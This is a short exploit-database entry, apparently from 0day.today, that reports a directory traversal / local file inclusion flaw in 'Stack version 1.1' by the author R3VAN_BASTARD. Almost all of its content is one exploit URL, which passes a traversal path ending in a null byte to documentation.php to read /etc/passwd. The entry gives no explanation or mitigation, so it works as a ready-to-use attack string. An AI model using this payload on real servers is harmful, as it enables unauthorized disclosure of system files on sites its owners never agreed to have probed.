id: 9665
date: 03/21/2010
title: New Advisore Stack Ver 1.1 Directory Traversal Vulnerability
author: R3VAN_BASTARD
cves: 

============================================================
New Advisore Stack Ver 1.1 Directory Traversal Vulnerability
============================================================

===============================================================================================
                             [L.F.I]STACK version 1.1[L.F.I]
===============================================================================================
Author  : R3VAN_BASTARD
Download: http://sourceforge.net/projects/stack/
===============================================================================================
 
exploit: http://localhost.com/stack/documentation.php?action=/../../../../../../../etc/passwd%00
 
===============================================================================================



#  0day.today [2023-03-26]  #